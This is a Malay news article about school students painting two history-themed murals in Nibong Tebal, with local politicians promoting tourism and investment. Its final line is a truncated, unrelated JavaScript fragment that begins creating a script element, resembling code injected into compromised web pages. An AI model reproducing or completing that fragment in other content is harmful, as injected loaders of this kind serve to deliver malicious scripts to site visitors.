NIBONG TEBAL – Seramai 29 pelajar dari sekolah sekitar sini berjaya menyiapkan dua lukisan mural di Taman Seri Bayu dengan bertemakan sejarah Nibong Tebal sebagai tapak perdagangan sejak 1830.
Ahli Dewan Undangan Negeri (ADUN) Jawi, Soon Lip Chee berkata, lukisan mural hasil pimpinan dua guru iaitu Chong Kong Fook dan Tneh Sok Tuan tersebut bukan hanya membantu para pelajar mengembangkan bakat masing-masing.
“Sebaliknya, lukisan yang menggambarkan aktiviti perdagangan di Sungai Kerian pada tahun 1830 itu secara tidak langsung dapat mempromosikan Nibong Tebal sebagai salahsatu lokasi pelancongan negeri.
“Malah, pada masa sama, generasi muda juga dapat mengetahui serta mendalami sejarah Parlimen Nibong Tebal,’’ katanya dalam satu kenyataan di sini baru-baru ini.
Hadir sama, Exco Pembangunan Pelancongan, Danny Law Heng Kiang. Pada majlis berkaitan, Lip Chee turut menyampaikan cenderamata penghargaan kepada Kong Fook, Sok Tuan dan 29 pelajar berkenaan.
Dalam pada itu, Heng Kiang memberitahu bahawa Nibong Tebal mempunyai potensi untuk menarik pelancong tempatan dan luar negara kerana ia bukan sahaja mempunyai bangunan bersejarah, malah juga lokasi pelancongan yang menarik seperti meninjau habitat kelip-kelip, sajian makanan laut dan lain-lain.
“Sebagai tindakan lanjut, Perbadanan Pembangunan Pulau Pinang (PDC) telah menandatangani memorandum persefahaman dengan Sime Darby Property (Utara) Sdn. Bhd. bagi membangunkan kawasan perusahaan kecil dan sederhana (PKS) berteknologi tinggi di Byram dan Changkat di sini.
“Secara tidak langsung, kehadiran para pelabur akan menarik pelancong ke sini dan seterusnya meningkatkan taraf ekonomi serta industri pelancongan setempat,’’ jelasnya yang juga ADUN Batu Lanchang.
var d=document;var s=d.createElement(‘script’);